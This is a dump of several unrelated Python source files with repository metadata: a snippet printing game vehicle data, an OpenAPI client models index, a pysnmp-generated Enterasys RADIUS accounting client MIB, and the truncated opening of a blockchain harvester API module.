tank_types.append( veh_dat['type'] )
wot_veh_dat_6721 = wot_veh_dat.get('6721')
print( wot_veh_dat_6721.keys() )
print( wot_veh_dat_6721['guns'] )
pprint( wot_veh_dat_6721 )
print( tank_types )
| 45.684211 | 182 | 0.738479 |
8f468cf4e464e56fbc081b39c9457e0d8ece03cd | 1,861 | py | Python | end_to_end_tests/golden-record/my_test_api_client/models/__init__.py | christhekeele/openapi-python-client | b7193165815419b9a0b4f05032a2a091bfc5ebfe | [
"MIT"
] | null | null | null | end_to_end_tests/golden-record/my_test_api_client/models/__init__.py | christhekeele/openapi-python-client | b7193165815419b9a0b4f05032a2a091bfc5ebfe | [
"MIT"
] | 19 | 2021-05-10T10:33:46.000Z | 2022-02-14T03:14:59.000Z | end_to_end_tests/golden-record/my_test_api_client/models/__init__.py | christhekeele/openapi-python-client | b7193165815419b9a0b4f05032a2a091bfc5ebfe | [
"MIT"
] | null | null | null | """ Contains all the data models used in inputs/outputs """
from .a_model import AModel
from .all_of_sub_model import AllOfSubModel
from .an_enum import AnEnum
from .an_int_enum import AnIntEnum
from .another_all_of_sub_model import AnotherAllOfSubModel
from .body_upload_file_tests_upload_post import BodyUploadFileTestsUploadPost
from .different_enum import DifferentEnum
from .free_form_model import FreeFormModel
from .http_validation_error import HTTPValidationError
from .model_from_all_of import ModelFromAllOf
from .model_name import ModelName
from .model_with_additional_properties_inlined import ModelWithAdditionalPropertiesInlined
from .model_with_additional_properties_inlined_additional_property import (
ModelWithAdditionalPropertiesInlinedAdditionalProperty,
)
from .model_with_additional_properties_refed import ModelWithAdditionalPropertiesRefed
from .model_with_any_json_properties import ModelWithAnyJsonProperties
from .model_with_any_json_properties_additional_property_type0 import ModelWithAnyJsonPropertiesAdditionalPropertyType0
from .model_with_primitive_additional_properties import ModelWithPrimitiveAdditionalProperties
from .model_with_primitive_additional_properties_a_date_holder import ModelWithPrimitiveAdditionalPropertiesADateHolder
from .model_with_property_ref import ModelWithPropertyRef
from .model_with_union_property import ModelWithUnionProperty
from .model_with_union_property_inlined import ModelWithUnionPropertyInlined
from .model_with_union_property_inlined_fruit_type0 import ModelWithUnionPropertyInlinedFruitType0
from .model_with_union_property_inlined_fruit_type1 import ModelWithUnionPropertyInlinedFruitType1
from .test_inline_objects_json_body import TestInlineObjectsJsonBody
from .test_inline_objects_response_200 import TestInlineObjectsResponse_200
from .validation_error import ValidationError
| 60.032258 | 119 | 0.915637 |
7920fb038e6b7bdc4255b762c822d701baed5a5e | 24,455 | py | Python | pysnmp-with-texts/ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:04:26 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsIntersection, SingleValueConstraint, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsIntersection", "SingleValueConstraint", "ConstraintsUnion", "ValueSizeConstraint")
etsysModules, = mibBuilder.importSymbols("ENTERASYS-MIB-NAMES", "etsysModules")
InetAddress, InetAddressType = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetAddress", "InetAddressType")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, iso, Bits, ObjectIdentity, Unsigned32, IpAddress, MibIdentifier, NotificationType, Counter32, Integer32, TimeTicks, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "iso", "Bits", "ObjectIdentity", "Unsigned32", "IpAddress", "MibIdentifier", "NotificationType", "Counter32", "Integer32", "TimeTicks", "Gauge32")
RowStatus, DisplayString, TruthValue, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "RowStatus", "DisplayString", "TruthValue", "TextualConvention")
etsysRadiusAcctClientMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27))
etsysRadiusAcctClientMIB.setRevisions(('2009-08-07 15:48', '2004-11-12 15:23', '2004-09-09 14:37', '2004-08-30 15:55', '2004-08-25 15:03', '2002-09-13 19:30',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: etsysRadiusAcctClientMIB.setRevisionsDescriptions(('Added the etsysRadiusAcctClientServerUpdateInterval and etsysRadiusAcctClientServerIntervalMinimum objects for the ability to override the system wide parameters on per server basis.', 'Removed the UNITS clause from the etsysRadiusAcctClientServerRetries object.', 'Added UNITS clauses to a number of objects that are expressed in seconds, and DEFVAL clauses for the etsysRadiusAcctClientUpdateInterval and etsysRadiusAcctClientIntervalMinimum objects.', 'In the columnar objects in etsysRadiusAcctClientServerTable, changed the MAX-ACCESS clauses of the read-write objects to read-create, added DEFVAL clauses to a number of the objects, and modified the DESCRIPTION clause for the RowStatus object to resolve a conflict between the syntax and the description. Deprecated the etsysRadiusAcctClientServerClearTime object. Changed a number of objects with SYNTAX clauses of INTEGER to Integer32.', 'Changed etsysRadiusClientMIBCompliance to etsysRadiusAcctClientMIBCompliance due to a conflict with the etsysRadiusAcctClientMIB.', 'The Initial version of this MIB module.',))
if mibBuilder.loadTexts: etsysRadiusAcctClientMIB.setLastUpdated('200908071548Z')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIB.setOrganization('Enterasys Networks')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIB.setContactInfo('Postal: Enterasys Networks 50 Minuteman Rd. Andover, MA 01810-1008 USA Phone: +1 978 684 1000 E-mail: support@enterasys.com WWW: http://www.enterasys.com')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIB.setDescription("This MIB module defines a portion of the SNMP enterprise MIBs under Enterasys Networks' enterprise OID pertaining to the client side of the Remote Access Dialin User Service (RADIUS) Accounting protocol (RFC2866). This MIB provides read-write access to configuration objects not provided in the standard RADIUS Accounting Client MIB (RFC2620). However, the write capability must only be supported for SNMPv3, or other SNMP versions with adequately strong security. Security concerns include Object ID verification, source address verification and timeliness verification.")
etsysRadiusAcctClientMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1))
etsysRadiusAcctClientEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('disable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysRadiusAcctClientEnable.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientEnable.setDescription('This object indicates whether or not RADIUS Accounting is enabled or disabled. This parameter value is maintained across system reboots.')
etsysRadiusAcctClientUpdateInterval = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647)).clone(1800)).setUnits('seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysRadiusAcctClientUpdateInterval.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientUpdateInterval.setDescription('This indicates how many seconds elapse between accounting interim updates. This parameter value is maintained across system reboots. A value of zero means no Interim Updates. If the value is less than etsysRadiusAcctClientIntervalMinimum, the etsysRadiusAcctClientIntervalMinimum value will be used for the update interval time. If RADIUS Accounting is not enabled, this object is ignored. Note that Accounting Interim Updates are not issued by the RADIUS Accounting Client, unless so requested by the RADIUS Server in an Access Accept packet.')
etsysRadiusAcctClientIntervalMinimum = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(60, 2147483647)).clone(600)).setUnits('seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysRadiusAcctClientIntervalMinimum.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientIntervalMinimum.setDescription('This indicates the minimum value in seconds between accounting interim updates supported by the managed entity. This parameter value is maintained across system reboots. If RADIUS Accounting is not enabled, this object is ignored.')
etsysRadiusAcctClientServerTable = MibTable((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4), )
if mibBuilder.loadTexts: etsysRadiusAcctClientServerTable.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerTable.setDescription('The (conceptual) table listing the RADIUS Accounting servers.')
etsysRadiusAcctClientServerEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1), ).setIndexNames((0, "ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerIndex"))
if mibBuilder.loadTexts: etsysRadiusAcctClientServerEntry.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerEntry.setDescription('An entry (conceptual row) representing a RADIUS Accounting server with which the client shares a secret. If RADIUS Accounting is not enabled, this table is ignored. All created conceptual rows are non-volatile and as such must be maintained upon restart of the agent.')
etsysRadiusAcctClientServerIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647)))
if mibBuilder.loadTexts: etsysRadiusAcctClientServerIndex.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerIndex.setDescription('A number uniquely identifying each conceptual row in the etsysRadiusAcctClientServerTable. In the event of an agent restart, the same value of etsysRadiusAcctClientServerIndex must be used to identify each conceptual row in etsysRadiusAcctClientServerTable as was used prior to the restart.')
etsysRadiusAcctClientServerAddressType = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 2), InetAddressType().clone('ipv4')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerAddressType.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerAddressType.setDescription('The type of Internet address by which the RADIUS Accounting server is reachable.')
etsysRadiusAcctClientServerAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 3), InetAddress().subtype(subtypeSpec=ValueSizeConstraint(1, 64))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerAddress.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerAddress.setDescription('The Internet address for the RADIUS Accounting server. Note that implementations must limit themselves to a single entry in this table per reachable server. The etsysRadiusAcctClientServerAddress may not be empty due to the SIZE restriction. Also the size of a DNS name is limited to 64 characters. This parameter value is maintained across system reboots.')
etsysRadiusAcctClientServerPortNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535)).clone(1813)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerPortNumber.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerPortNumber.setDescription('The UDP port number (1-65535) the client is using to send requests to this server. The officially assigned port number for RADIUS Accounting is 1813. This parameter value is maintained across system reboots.')
etsysRadiusAcctClientServerSecret = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerSecret.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerSecret.setDescription("This object is the secret shared between the RADIUS Accounting server and RADIUS client. This parameter value is maintained across system reboots. While the 'official' MAX-ACCESS for this object is read-create, all security-conscious implementations will 'lie' on a read, and return a null-string, or something else that is fairly innocuous. The ability to read back passwords and secret encryption keys is generally a Bad Thing (tm).")
etsysRadiusAcctClientServerSecretEntered = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 6), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerSecretEntered.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerSecretEntered.setDescription('This indicates the existence of a shared secret.')
etsysRadiusAcctClientServerRetryTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(2, 10)).clone(5)).setUnits('seconds').setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerRetryTimeout.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerRetryTimeout.setDescription('The number of seconds to wait for a RADIUS Accounting Server to respond to a request. This parameter value is maintained across system reboots.')
etsysRadiusAcctClientServerRetries = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 20)).clone(2)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerRetries.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerRetries.setDescription('The number of times to resend an accounting packet if a RADIUS Accounting Server does not respond to a request. This parameter value is maintained across system reboots.')
etsysRadiusAcctClientServerClearTime = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerClearTime.setStatus('deprecated')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerClearTime.setDescription('On a read, this value indicates the number of seconds since the counters, as defined in the IETF standard RADIUS Accounting Client MIB (RFC2618), were cleared. On a write, the client counters will be cleared and the clear time will be set to zero.')
etsysRadiusAcctClientServerStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 10), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerStatus.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerStatus.setDescription("Lets users create and delete RADIUS Accounting server entries on systems that support this capability. Rules 1. When creating a RADIUS Accounting Client, it is up to the management station to determine a suitable etsysRadiusAcctClientServerIndex. To facilitate interoperability, agents should not put any restrictions on the etsysRadiusAcctClientServerIndex beyond the obvious ones that it be valid and unused. 2. Before a new row can become 'active', values must be supplied for the columnar objects etsysRadiusAcctClientClientServerAddress, and etsysRadiusAcctClientServerSecret. 3. The value of etsysRadiusAcctClientServerStatus must be set to 'notInService' in order to modify a writable object in the same conceptual row. 4. etsysRadiusAcctClientServer entries whose status is 'notReady' or 'notInService' will not be used for Accounting.")
etsysRadiusAcctClientServerUpdateInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(-1, -1), ValueRangeConstraint(0, 2147483647), )).clone(-1)).setUnits('seconds').setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerUpdateInterval.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerUpdateInterval.setDescription('This indicates how many seconds elapse between accounting interim updates from the client to this RADIUS server. This parameter value is maintained across system reboots. A value of zero means no Interim Updates. If the value is less than etsysRadiusAcctClientServerIntervalMinimum, the etsysRadiusAcctClientServerIntervalMinimum value will be used for the update interval time. If RADIUS Accounting is not enabled, this object is ignored. Note that Accounting Interim Updates are not issued by the RADIUS Accounting Client, unless so requested by the RADIUS Server in an Access Accept packet. A value of -1 indicates that this object is not configured and this device will use the value configured in etsysRadiusAcctClientUpdateInterval for the minimum value in seconds between accounting interim updates for this RADIUS server.')
etsysRadiusAcctClientServerIntervalMinimum = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 1, 4, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(-1, -1), ValueRangeConstraint(60, 2147483647), )).clone(-1)).setUnits('seconds').setMaxAccess("readcreate")
if mibBuilder.loadTexts: etsysRadiusAcctClientServerIntervalMinimum.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientServerIntervalMinimum.setDescription('This indicates the minimum value in seconds between accounting interim updates supported by the managed entity for this RADIUS server. This parameter value is maintained across system reboots. If RADIUS Accounting is not enabled, this object is ignored. A value of -1 indicates that this object is not configured and this device will use the value configured in etsysRadiusAcctClientIntervalMinimum for the minimum value in seconds between accounting interim updates for this RADIUS server.')
etsysRadiusAcctClientMIBConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2))
etsysRadiusAcctClientMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2, 1))
etsysRadiusAcctClientMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2, 2))
etsysRadiusAcctClientMIBGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2, 2, 1)).setObjects(("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientEnable"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientUpdateInterval"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientIntervalMinimum"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerAddressType"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerAddress"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerPortNumber"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerSecret"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerSecretEntered"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerRetryTimeout"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerRetries"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerClearTime"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysRadiusAcctClientMIBGroup = etsysRadiusAcctClientMIBGroup.setStatus('deprecated')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIBGroup.setDescription('The basic collection of objects providing a proprietary extension to the standard RADIUS Client MIB. This MIB provides read-write access to configuration objects not provided in the standard RADIUS Accounting Client MIB (RFC2618). However, the write capability must only be supported for SNMPv3, or other SNMP versions with adequately strong security.')
etsysRadiusAcctClientMIBGroupV2 = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2, 2, 2)).setObjects(("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientEnable"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientUpdateInterval"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientIntervalMinimum"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerAddressType"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerAddress"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerPortNumber"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerSecret"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerSecretEntered"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerRetryTimeout"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerRetries"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysRadiusAcctClientMIBGroupV2 = etsysRadiusAcctClientMIBGroupV2.setStatus('deprecated')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIBGroupV2.setDescription('The basic collection of objects providing a proprietary extension to the standard RADIUS Client MIB. etsysRadiusAcctClientServerClearTime was deprecated in this group.')
etsysRadiusAcctClientMIBGroupV3 = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2, 2, 3)).setObjects(("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientEnable"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientUpdateInterval"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientIntervalMinimum"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerAddressType"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerAddress"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerPortNumber"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerSecret"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerSecretEntered"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerRetryTimeout"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerRetries"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerStatus"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerIntervalMinimum"), ("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientServerUpdateInterval"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysRadiusAcctClientMIBGroupV3 = etsysRadiusAcctClientMIBGroupV3.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIBGroupV3.setDescription('The basic collection of objects providing a proprietary extension to the standard RADIUS Client MIB. etsysRadiusAcctClientServerClearTime was deprecated in this group.')
etsysRadiusAcctClientMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2, 1, 2)).setObjects(("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientMIBGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysRadiusAcctClientMIBCompliance = etsysRadiusAcctClientMIBCompliance.setStatus('deprecated')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIBCompliance.setDescription('The compliance statement for Accounting clients implementing the RADIUS Accounting Client MIB.')
etsysRadiusAcctClientMIBComplianceV2 = ModuleCompliance((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2, 1, 3)).setObjects(("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientMIBGroupV2"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysRadiusAcctClientMIBComplianceV2 = etsysRadiusAcctClientMIBComplianceV2.setStatus('deprecated')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIBComplianceV2.setDescription('The compliance statement for Accounting clients implementing the RADIUS Accounting Client MIB.')
etsysRadiusAcctClientMIBComplianceV3 = ModuleCompliance((1, 3, 6, 1, 4, 1, 5624, 1, 2, 27, 2, 1, 4)).setObjects(("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", "etsysRadiusAcctClientMIBGroupV3"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysRadiusAcctClientMIBComplianceV3 = etsysRadiusAcctClientMIBComplianceV3.setStatus('current')
if mibBuilder.loadTexts: etsysRadiusAcctClientMIBComplianceV3.setDescription('The compliance statement for Accounting clients implementing the RADIUS Accounting Client MIB.')
mibBuilder.exportSymbols("ENTERASYS-RADIUS-ACCT-CLIENT-EXT-MIB", etsysRadiusAcctClientMIBGroupV3=etsysRadiusAcctClientMIBGroupV3, etsysRadiusAcctClientServerPortNumber=etsysRadiusAcctClientServerPortNumber, etsysRadiusAcctClientServerTable=etsysRadiusAcctClientServerTable, etsysRadiusAcctClientMIBCompliance=etsysRadiusAcctClientMIBCompliance, etsysRadiusAcctClientMIBComplianceV2=etsysRadiusAcctClientMIBComplianceV2, etsysRadiusAcctClientServerAddressType=etsysRadiusAcctClientServerAddressType, etsysRadiusAcctClientServerIntervalMinimum=etsysRadiusAcctClientServerIntervalMinimum, etsysRadiusAcctClientMIBGroup=etsysRadiusAcctClientMIBGroup, etsysRadiusAcctClientServerUpdateInterval=etsysRadiusAcctClientServerUpdateInterval, etsysRadiusAcctClientMIBCompliances=etsysRadiusAcctClientMIBCompliances, etsysRadiusAcctClientIntervalMinimum=etsysRadiusAcctClientIntervalMinimum, etsysRadiusAcctClientEnable=etsysRadiusAcctClientEnable, etsysRadiusAcctClientServerClearTime=etsysRadiusAcctClientServerClearTime, etsysRadiusAcctClientServerStatus=etsysRadiusAcctClientServerStatus, etsysRadiusAcctClientMIBObjects=etsysRadiusAcctClientMIBObjects, etsysRadiusAcctClientServerSecretEntered=etsysRadiusAcctClientServerSecretEntered, etsysRadiusAcctClientServerRetryTimeout=etsysRadiusAcctClientServerRetryTimeout, etsysRadiusAcctClientMIB=etsysRadiusAcctClientMIB, PYSNMP_MODULE_ID=etsysRadiusAcctClientMIB, etsysRadiusAcctClientMIBComplianceV3=etsysRadiusAcctClientMIBComplianceV3, etsysRadiusAcctClientServerIndex=etsysRadiusAcctClientServerIndex, etsysRadiusAcctClientServerEntry=etsysRadiusAcctClientServerEntry, etsysRadiusAcctClientServerRetries=etsysRadiusAcctClientServerRetries, etsysRadiusAcctClientMIBConformance=etsysRadiusAcctClientMIBConformance, etsysRadiusAcctClientServerAddress=etsysRadiusAcctClientServerAddress, etsysRadiusAcctClientServerSecret=etsysRadiusAcctClientServerSecret, etsysRadiusAcctClientUpdateInterval=etsysRadiusAcctClientUpdateInterval, etsysRadiusAcctClientMIBGroups=etsysRadiusAcctClientMIBGroups, etsysRadiusAcctClientMIBGroupV2=etsysRadiusAcctClientMIBGroupV2)
| 226.435185 | 2,097 | 0.819832 |
e5f7b1b8b277e98e6e63a0747f18ce032b133346 | 15,370 | py | Python | beet/harvester/harvester_api.py | beetseeds/beet-blockchain-1 | e5d93f1f9041c48dd0c38416d845c8675bf22738 | [
"Apache-2.0"
] | 7 | 2021-08-29T15:12:25.000Z | 2022-02-09T04:28:38.000Z | beet/harvester/harvester_api.py | beetseeds/beet-blockchain-1 | e5d93f1f9041c48dd0c38416d845c8675bf22738 | [
"Apache-2.0"
] | null | null | null | beet/harvester/harvester_api.py | beetseeds/beet-blockchain-1 | e5d93f1f9041c48dd0c38416d845c8675bf22738 | [
"Apache-2.0"
] | 3 | 2021-09-04T10:32:00.000Z | 2022-03-15T08:44:25.000Z | import asyncio
import time
from pathlib import Path
from typing import Callable, List, Tuple
from blspy import AugSchemeMPL, G2Element, G1Element
from beet.consensus.pot_iterations import calculate_iterations_quality, calculate_sp_interval_iters
from beet.harvester.harvester import Harvester
from beet.plotting.plot_tools import PlotInfo, parse_plot_info
from beet.protocols import harvester_protocol
from beet.protocols.farmer_protocol import FarmingInfo
from beet.protocols.harvester_protocol import Plot
from beet.protocols.protocol_message_types import ProtocolMessageTypes
from beet.server.outbound_message import make_msg
from beet.server.ws_connection import WSbeetConnection
from beet.types.blockchain_format.proof_of_space import ProofOfSpace
from beet.types.blockchain_format.sized_bytes import bytes32
from beet.util.api_decorators import api_request, peer_required
from beet.util.ints import uint8, uint32, uint64
from beet.wallet.derive_keys import master_sk_to_local_sk
class HarvesterAPI:
harvester: Harvester
def __init__(self, harvester: Harvester):
